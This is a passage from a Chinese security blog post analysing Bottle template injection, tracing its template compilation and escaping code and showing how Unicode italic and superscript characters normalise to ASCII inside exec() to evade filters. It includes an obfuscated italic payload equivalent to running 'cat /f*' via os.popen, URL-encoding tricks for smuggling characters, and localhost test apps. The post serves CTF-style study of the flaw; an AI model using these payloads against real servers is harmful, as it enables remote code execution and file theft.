class="string">&#x27;_printlist((%s,))&#x27;</span> % <span class="string">&#x27;, &#x27;</span>.join(parts)</span><br><span class="line">    <span class="variable language_">self</span>.lineno += code.count(<span class="string">&#x27;\n&#x27;</span>) + <span class="number">1</span></span><br><span class="line">    <span class="variable language_">self</span>.write_code(code)</span><br></pre></td></tr></table></figure>

<p>这里我们在code下方加一个<code>print(code)</code></p>
<p>我们访问<code>http://127.0.0.1:5000/attack?payload=hello&#123;&#123;hello%20world&#125;&#125;</code>，服务端回显如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hello&#123;&#123;hello world&#125;&#125;</span><br><span class="line">_printlist((&#x27;hello hello&#x27;, _escape(hello world),))</span><br></pre></td></tr></table></figure>

<p>这个_printlist就是在exec执行的全局空间里的打印函数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">env.update(&#123;</span><br><span class="line">            <span class="string">&#x27;_stdout&#x27;</span>: _stdout,</span><br><span class="line">            <span class="string">&#x27;_printlist&#x27;</span>: _stdout.extend,</span><br><span class="line">            <span class="string">&#x27;include&#x27;</span>: functools.partial(<span class="variable language_">self</span>._include, env),</span><br><span class="line">            <span class="string">&#x27;rebase&#x27;</span>: functools.partial(<span class="variable language_">self</span>._rebase, env),</span><br><span class="line">            <span class="string">&#x27;_rebase&#x27;</span>: <span class="literal">None</span>,</span><br><span class="line">            <span class="string">&#x27;_str&#x27;</span>: <span class="variable language_">self</span>._<span class="built_in">str</span>,</span><br><span class="line">            <span class="string">&#x27;_escape&#x27;</span>: <span class="variable language_">self</span>._escape,</span><br><span class="line">            <span class="string">&#x27;get&#x27;</span>: env.get,</span><br><span class="line">            <span class="string">&#x27;setdefault&#x27;</span>: env.setdefault,</span><br><span class="line">            <span class="string">&#x27;defined&#x27;</span>: env.__contains__</span><br><span class="line">        &#125;)</span><br></pre></td></tr></table></figure>

<p>然后我们接着看<code>flush_text</code>，其中有</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">parts.append(self.process_inline(m.group(1).strip()))</span><br></pre></td></tr></table></figure>

<p>每一行模板都会经过它，<code>self.process_inline(m.group(1).strip())</code>，我们跟进一下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">process_inline</span>(<span class="params">chunk</span>):</span><br><span class="line">    <span class="keyword">if</span> chunk[<span class="number">0</span>] == <span class="string">&#x27;!&#x27;</span>: <span class="keyword">return</span> <span class="string">&#x27;_str(%s)&#x27;</span> % chunk[<span class="number">1</span>:]</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;_escape(%s)&#x27;</span> % chunk</span><br></pre></td></tr></table></figure>

<p>这里我们发现了与转码有关的<code>_escape</code>函数，我们接下来跟进一下 <code>self._escape</code>，发现他在prepare中被定义。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SimpleTemplate</span>(<span class="title class_ inherited__">BaseTemplate</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">prepare</span>(<span class="params">self,</span></span><br><span class="line"><span class="params">                escape_func=html_escape,</span></span><br><span class="line"><span class="params">                noescape=<span class="literal">False</span>,</span></span><br><span class="line"><span class="params">                syntax=<span class="literal">None</span>, **ka</span>):</span><br><span class="line">        <span class="variable language_">self</span>.cache = &#123;&#125;</span><br><span class="line">        enc = <span class="variable language_">self</span>.encoding</span><br><span class="line">        <span class="variable language_">self</span>._<span class="built_in">str</span> = <span class="keyword">lambda</span> x: touni(x, enc)</span><br><span class="line">        <span class="variable language_">self</span>._escape = <span class="keyword">lambda</span> x: escape_func(touni(x, enc))</span><br><span class="line">        <span class="variable language_">self</span>.syntax = syntax</span><br><span class="line">        <span class="keyword">if</span> noescape:</span><br><span class="line">            <span class="variable language_">self</span>._<span class="built_in">str</span>, <span class="variable language_">self</span>._escape = <span class="variable language_">self</span>._escape, <span class="variable language_">self</span>._<span class="built_in">str</span></span><br></pre></td></tr></table></figure>

<p>还记得每一次进入SimpleTemplate都有一次初始化吗，就是<code>prepare</code>函数这些。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">self._escape = lambda x: escape_func(touni(x, enc))</span><br></pre></td></tr></table></figure>

<p>我们跟进一下<code>escape_func</code>，发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">escape_func=html_escape</span><br></pre></td></tr></table></figure>

<p>再跟进一下<code>html_escape</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">html_escape</span>(<span class="params">string</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot; Escape HTML special characters ``&amp;&lt;&gt;`` and quotes ``&#x27;&quot;``. &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> string.replace(<span class="string">&#x27;&amp;&#x27;</span>, <span class="string">&#x27;&amp;amp;&#x27;</span>).replace(<span class="string">&#x27;&lt;&#x27;</span>, <span class="string">&#x27;&amp;lt;&#x27;</span>).replace(<span class="string">&#x27;&gt;&#x27;</span>, <span class="string">&#x27;&amp;gt;&#x27;</span>)\</span><br><span class="line">                 .replace(<span class="string">&#x27;&quot;&#x27;</span>, <span class="string">&#x27;&amp;quot;&#x27;</span>).replace(<span class="string">&quot;&#x27;&quot;</span>, <span class="string">&#x27;&amp;#039;&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>就是一个防止XSS的HTML编码函数。</p>
<p>至此我们得出结论：<strong>我们的输入，不论在不在<code>&#123;&#123;&#125;&#125;</code>里，经过唯一的编码检查就是对source的<code>touni()</code>，但是由于全局变量中的unicode在python3下是全体str，这就导致了我们可以输入斜体字符</strong></p>
<p>这里给出一个斜体字符生成器：<a target="_blank" rel="noopener" href="https://exotictext.com/zh-cn/italic/">https://exotictext.com/zh-cn/italic/</a></p>
<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408184735562.png" class="" title="This is an example image">

<p>这里3.12.2及其之前的python版本如果执行上述命令会报错！</p>
<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408185439286.png" class="" title="This is an example image">

<p>最后的代码由python的<code>exec()</code>来执行</p>
<p>假如直接<code>exec()</code>任意code的话，python会把code中当作代码处理的斜体字根据<code>Decomposition</code>转成对应的ASCII字符（当作字符串处理的除外，如此例中，假如whoami或os为斜体，则会无法执行，因为找不到斜体的os库，和斜体的whoami命令），这里<code>os</code>和<code>whoami</code>是当作字符串处理的！</p>
<p>看到这里，我想起之前ctf一道ssti的题也考到了这种斜体的方法，这里给出一个payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">𝒈𝒆𝒕𝒂𝒕𝒕𝒓(𝒈𝒆𝒕𝒂𝒕𝒕𝒓(__𝒊𝒎𝒑𝒐𝒓𝒕__(𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒎𝒂𝒙(𝒅𝒊𝒄𝒕(𝒋𝒐𝒊𝒏=())))(𝒎𝒂𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎𝒂𝒑(𝒄𝒉𝒓,[111, 115]))),𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒎𝒂𝒙(𝒅𝒊𝒄𝒕(𝒋𝒐𝒊𝒏=())))(𝒎𝒂𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎𝒂𝒑(𝒄𝒉𝒓,[112,111,112,101,110])))(𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒎𝒂𝒙(𝒅𝒊𝒄𝒕(𝒋𝒐𝒊𝒏=())))(𝒎𝒂𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎𝒂𝒑(𝒄𝒉𝒓,[99,97,116,32,47,102,42]))),𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒈𝒆𝒕𝒂𝒕𝒕𝒓(&#x27;&#x27;,𝒎𝒂𝒙(𝒅𝒊𝒄𝒕(𝒋𝒐𝒊𝒏=())))(𝒎𝒂𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎𝒂𝒑(𝒄𝒉𝒓,[114,101,97,100])))()</span><br></pre></td></tr></table></figure>

<p>他这个其实是等价于<code>__import__(&#39;os&#39;).popen(&#39;cat /f*&#39;).read()</code></p>
<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408190441433.png" class="" title="This is an example image">





<p>接下来再说说为什么只有两个字符<code>ª</code> (U+00AA)，<code>º</code> (U+00BA)成功了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;Âªbs(-1)&#125;&#125;</span><br><span class="line">127.0.0.1 - - [08/Apr/2025 19:06:12] &quot;GET /attack?payload=&#123;&#123;%C2%AAbs(-1)&#125;&#125; HTTP/1.1&quot; 400 752</span><br></pre></td></tr></table></figure>

<p>这些特殊字符经过URL编码之后一个字符都必须以两个编码值表示。但是bottle在解析编码值的时候是按照一个编码值对应一个字符进行解析的，那么bottle解析的就是<code>%C2</code>,只要删除掉<code>%C2</code>就能将字符传入后端！</p>
<p>我们再看看其他的有没有可利用的！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;Âªbs(-Â¹)&#125;&#125;</span><br><span class="line">http://127.0.0.1:5000/attack?payload=&#123;&#123;%C2%AAbs(-%C2%B9)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>若把前面的<code>%C2</code>删除，我们传入如下的参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:5000/attack?payload=&#123;&#123;%AAbs(%B9)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>服务端回显如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;ªbs(¹)&#125;&#125;</span><br><span class="line">127.0.0.1 - - [08/Apr/2025 19:12:10] &quot;GET /attack?payload=&#123;&#123;%AAbs(%B9)&#125;&#125; HTTP/1.1&quot; 400 750</span><br></pre></td></tr></table></figure>

<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408191231182.png" class="" title="This is an example image">

<p>那就是不行喽！</p>
<p>其中只有<code>ª</code> (U+00AA)，<code>º</code> (U+00BA)，<code>¹</code> (U+00B9)，<code>²</code> (U+00B2)，<code>³</code> (U+00B3)有用，其中<code>¹</code> (U+00B9)，<code>²</code> (U+00B2)，<code>³</code> (U+00B3)在<code>exec()</code>时不会被python正确解析。而<code>ª</code> (U+00AA)，<code>º</code> (U+00BA)执行的时候等效于字符<code>a</code>,<code>o</code>，别的字符RCE根本用不上。</p>
<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408191406445.png" class="" title="This is an example image">



<p>这里稍微总结一下，如果我们是从前端传入的，那么一定会经过url编码，举个例子：</p>
<p>我们传入的是<code>&#123;&#123;𝒶𝒷𝓈(1)&#125;&#125;</code>，但是后端无法将其解析，前端页面会报错400。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 - - [08/Apr/2025 19:15:16] &quot;GET /attack?payload=&#123;&#123;%F0%9D%92%B6%F0%9D%92%B7%F0%9D%93%88(1)&#125;&#125; HTTP/1.1&quot; 400 779</span><br><span class="line">&#123;&#123;ð¶ð·ð(1)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>但是如果我们直接在后端传入<code>𝒶𝒷𝓈(1)</code>，将以下语句直接加入代码中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> bottle</span><br><span class="line"><span class="meta">@bottle.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;Hello, World!&#x27;</span></span><br><span class="line"><span class="meta">@bottle.route(<span class="params"><span class="string">&#x27;/attack&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">attack</span>():</span><br><span class="line">    <span class="keyword">return</span> bottle.template(<span class="string">&#x27;&#123;&#123;𝒶𝒷𝓈(-2)&#125;&#125;&#x27;</span>)</span><br><span class="line">    <span class="comment"># payload = bottle.request.query.get(&#x27;payload&#x27;)</span></span><br><span class="line">    <span class="comment"># print(payload)</span></span><br><span class="line">    <span class="comment"># try:</span></span><br><span class="line">    <span class="comment">#     return bottle.template(&#x27;hello &#x27;+payload)</span></span><br><span class="line">    <span class="comment"># except:</span></span><br><span class="line">    <span class="comment">#     bottle.abort(400, &#x27;Invalid payload&#x27;)</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    bottle.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">5000</span>)</span><br></pre></td></tr></table></figure>

<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408191732187.png" class="" title="This is an example image">

<p>我们访问时前端正常回显！</p>
<p>再看看<code>ª</code> (U+00AA)，<code>º</code> (U+00BA)，如果我们前端传入，他会以两个编码值表示，而bottle在解析编码值的时候是按照一个编码值对应一个字符进行解析的，所以如果我们直接传入<code>ª</code> (U+00AA)或者<code>º</code> (U+00BA)，那么必然也是会报错的，因此在前端传入时需要将前面的<code>%C2</code>删除后再传入！</p>
<p>那么如果直接从后端传入呢？看看效果</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> bottle</span><br><span class="line"><span class="meta">@bottle.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;Hello, World!&#x27;</span></span><br><span class="line"><span class="meta">@bottle.route(<span class="params"><span class="string">&#x27;/attack&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">attack</span>():</span><br><span class="line">    <span class="keyword">return</span> bottle.template(<span class="string">&#x27;&#123;&#123;ªbs(-1)&#125;&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    bottle.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">5000</span>)</span><br></pre></td></tr></table></figure>

<img src="/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/image-20250408192016120.png" class="" title="This is an example image">



<p>因此我们所有的问题都聚焦在如何将斜体字符传入template中。</p>
<p>get（post）传参特殊字符必须进行URL编码的原因，因此我们是无法传入这种斜体字符的。但是假设靶机提供了一种可以不使用URL编码的方式将可控输入传入template（如：上传文件，再渲染文件中的内容形成的SSTI）那就意味着所有的字符可以全部用各种斜体替换（是的，一个ASCII的斜体字符至少4种），那就真的超模了。</p>
<p>对于任意ASCII字母都至少可以在<a target="_blank" rel="noopener" href="https://exotictext.com/zh-cn/italic/%E4%B8%8A%E6%89%BE%E5%88%B0%E5%9B%9B%E7%A7%8D%E5%AF%B9%E5%BA%94%E7%9A%84%E6%96%9C%E4%BD%93%E3%80%82%E5%9C%A8python%E4%B8%AD%E9%83%BD%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E5%BD%93%E6%88%90ASCII%E6%AD%A3%E5%B8%B8%E6%89%A7%E8%A1%8C%E3%80%82%E5%81%87%E8%AE%BE%E6%88%91%E4%BB%AC%E8%83%BD%E6%8A%8A%E8%BF%99%E4%BA%9B%E4%B8%9C%E8%A5%BF%E4%BC%A0%E5%88%B0%E5%90%8E%E7%AB%AF%EF%BC%8C%E4%B8%8D%E4%BC%9A%E8%A7%A6%E5%8F%91%E9%92%88%E5%AF%B9%E8%AF%A5%E5%AD%97%E7%AC%A6%E7%9A%84waf%EF%BC%8Cbottle%E6%B8%B2%E6%9F%93%E5%AE%8C%E6%88%90%E5%90%8E%E5%B0%B1%E4%BC%9A%E7%9B%B4%E6%8E%A5%E8%BF%9B%E5%85%A5exec%EF%BC%8C%E5%8F%AF%E4%BB%A5%E6%AD%A3%E5%B8%B8RCE%E3%80%82">https://exotictext.com/zh-cn/italic/上找到四种对应的斜体。在python中都可以直接当成ASCII正常执行。假设我们能把这些东西传到后端，不会触发针对该字符的waf，bottle渲染完成后就会直接进入exec，可以正常RCE。</a></p>
<p>参考文章：</p>
<p>拉蒙特徐宝子</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/LAMENTXU/articles/18805019">https://www.cnblogs.com/LAMENTXU/articles/18805019</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Meteor_Kai</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://meteorkai.github.io/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/">http://meteorkai.github.io/2025/04/08/bottle%E6%A1%86%E6%9E%B6%E6%96%9C%E4%BD%93%E5%AD%97%E5%BC%95%E5%8F%91%E7%9A%84ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>CyberSecurity brings me great joy!</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/Python%E6%A1%86%E6%9E%B6/"># Python框架</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2025/04/09/XYCTF2025-Web-wp/">XYCTF2025 Web wp</a>
            
            
            <a class="next" rel="next" href="/2025/04/07/NCTF2024-web-wp/">NCTF2024 web wp</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Meteor_Kai | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>